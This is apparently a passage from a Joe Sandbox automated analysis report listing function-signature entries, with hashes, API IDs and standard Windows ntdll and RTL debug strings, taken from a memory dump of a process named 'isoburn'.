                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: 107b00ebb96ce7e082bea14758166932f62fc309d7eefef00c91ee7e6178e815
                                                                          • Instruction ID: d5687e88d2b69631b8b6240fe568d4026bc313008e5c08b0650b2c2187587f0d
                                                                          • Opcode Fuzzy Hash: 107b00ebb96ce7e082bea14758166932f62fc309d7eefef00c91ee7e6178e815
                                                                          • Instruction Fuzzy Hash: 6D512679A08645AFEB30DE5CC9809FFB7FAEB44200B00885BE4DAD7641D6F4DA009771
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05474742
                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05474725
                                                                          • Execute=1, xrefs: 05474713
                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05474655
                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 054746FC
                                                                          • ExecuteOptions, xrefs: 054746A0
                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 05474787
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                          • API String ID: 0-484625025
                                                                          • Opcode ID: 764a950f8af94901a41d680358983032930e48c79c61cf0f190f2653b18b66fc
                                                                          • Instruction ID: f9e7e8aa5d1dcb2f3d2e76043f2e4681212a8070b5b6909c7f8f5148103abdc0
                                                                          • Opcode Fuzzy Hash: 764a950f8af94901a41d680358983032930e48c79c61cf0f190f2653b18b66fc
                                                                          • Instruction Fuzzy Hash: 3A51E8B17402197ADF15EAA59C9AFFA77A9EB08310F0400EFE505A7290DB71AB45CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-$0$0
                                                                          • API String ID: 1302938615-699404926
                                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                          • Instruction ID: dd81cf3eed79b7c8fecb4dd81f4cfac163b85cef410177689707ca02ecaeada4
                                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                          • Instruction Fuzzy Hash: B4817F70A892499AFF24CF68C891BFFBBA2FF45320F18459BD891A7391C634D8418F55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$[$]:%u
                                                                          • API String ID: 48624451-2819853543
                                                                          • Opcode ID: c16d07700f485489c171e41758ad70172d06894e3b2a479735000af647286fee
                                                                          • Instruction ID: 4466971e5008706407e34360d3f0d6e6156b54d5f50ba8832bd8694d68b2f320
                                                                          • Opcode Fuzzy Hash: c16d07700f485489c171e41758ad70172d06894e3b2a479735000af647286fee
                                                                          • Instruction Fuzzy Hash: B221627AA04119ABEB10DF79DC44AFFBBF9EF54650F04015BE905E3200EBB0D9068BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 054702BD
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 054702E7
                                                                          • RTL: Re-Waiting, xrefs: 0547031E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                          • API String ID: 0-2474120054
                                                                          • Opcode ID: 871064d08313f64dc0a7ca94ab0c566c89964bf54843fea17cd16ce3dbbc8819
                                                                          • Instruction ID: 842b5d965af2b4ba4893f4a8321d464afd93f084c6e4203c3441433160873a7d
                                                                          • Opcode Fuzzy Hash: 871064d08313f64dc0a7ca94ab0c566c89964bf54843fea17cd16ce3dbbc8819
                                                                          • Instruction Fuzzy Hash: EEE1AD30608751AFD724CF28C889BAAB7F1FB84714F944A9EF59587390D774E849CB42
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05477B7F
                                                                          • RTL: Re-Waiting, xrefs: 05477BAC
                                                                          • RTL: Resource at %p, xrefs: 05477B8E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 0-871070163
                                                                          • Opcode ID: 3182f528112c72a19875e7238d62b76da8d86ca16d4123987774e38b1afd7f74
                                                                          • Instruction ID: 9dfa3175d0e5506f506e4f8ea5b4339e0f8591ed48cd5ac5f46308d2fac0d373
                                                                          • Opcode Fuzzy Hash: 3182f528112c72a19875e7238d62b76da8d86ca16d4123987774e38b1afd7f74
                                                                          • Instruction Fuzzy Hash: 9C41E0317047069BD724DE29C842FEBB7E6FB88720F000A5EE95ADB790DB31E4058B91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0547728C
                                                                          Strings
                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05477294
                                                                          • RTL: Re-Waiting, xrefs: 054772C1
                                                                          • RTL: Resource at %p, xrefs: 054772A3
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 885266447-605551621
                                                                          • Opcode ID: 6413199a7e2b2fc89d36e1cb367ea1010c8d760c9bd8c5471098e64ddd5d5337
                                                                          • Instruction ID: ef5d6cc1d5a467b8dbe1ba466966a7971567c668fb1ff1a01b47df3334ce27d7
                                                                          • Opcode Fuzzy Hash: 6413199a7e2b2fc89d36e1cb367ea1010c8d760c9bd8c5471098e64ddd5d5337
                                                                          • Instruction Fuzzy Hash: 6E41F031704206ABC725DE25CC42FEAB7A6FB98710F10061AF965EB380DB31E806DBD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$]:%u
                                                                          • API String ID: 48624451-3050659472
                                                                          • Opcode ID: 2a1ae293021fe9111b35b337a5cfd1ff63936959e97735ed2e536c62e3932167
                                                                          • Instruction ID: fae0fd3eb3a60cf20bf7f311b573b4ee629dbabe848fa56a1e9b39f9e15d6392
                                                                          • Opcode Fuzzy Hash: 2a1ae293021fe9111b35b337a5cfd1ff63936959e97735ed2e536c62e3932167
                                                                          • Instruction Fuzzy Hash: FE318476A042199FDB60DF39DC44BEF77B8FB44610F44059AE849E3200EB709A458BB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-
                                                                          • API String ID: 1302938615-2137968064
                                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                          • Instruction ID: f8dc60de48a50a10a4492ffa07110232d45f3bda99bb9bd443033dde9a8a1234
                                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                          • Instruction Fuzzy Hash: 73918F70E842169AFB24DE69C881AFFB7A6FF44320F64865BE855A73C4D73099438F50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $$@
                                                                          • API String ID: 0-1194432280
                                                                          • Opcode ID: 0d1835057257c448acbf3cc9f87a41a65b55f31cc98c4c8b652ccf685e7f0dbd
                                                                          • Instruction ID: 753adab64924b8cb0b1c8135a7a2db1be4c3eadc0f9608ccac3c519c07292505
                                                                          • Opcode Fuzzy Hash: 0d1835057257c448acbf3cc9f87a41a65b55f31cc98c4c8b652ccf685e7f0dbd
                                                                          • Instruction Fuzzy Hash: D4812A75E052699BDB35CF54CC44BEAB7B4AB08710F1441EBE90AB7280D7709E85CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 0548CFBD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: CallFilterFunc@8
                                                                          • String ID: @$@4rw@4rw
                                                                          • API String ID: 4062629308-2979693914
                                                                          • Opcode ID: 0f855b7d6275299fff6f5417d3fb59edf62381577f9255e0a68f462fc4e84ef0
                                                                          • Instruction ID: f24f411caa863dbd049a329df22b985e7fd3606ed12e2b68fbb9c84f8b8a61bf
                                                                          • Opcode Fuzzy Hash: 0f855b7d6275299fff6f5417d3fb59edf62381577f9255e0a68f462fc4e84ef0
                                                                          • Instruction Fuzzy Hash: 1E418D71E00214DFDB21AFAAC844AEEBBB8FF46704F10442BE915EB294D7749901DB65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%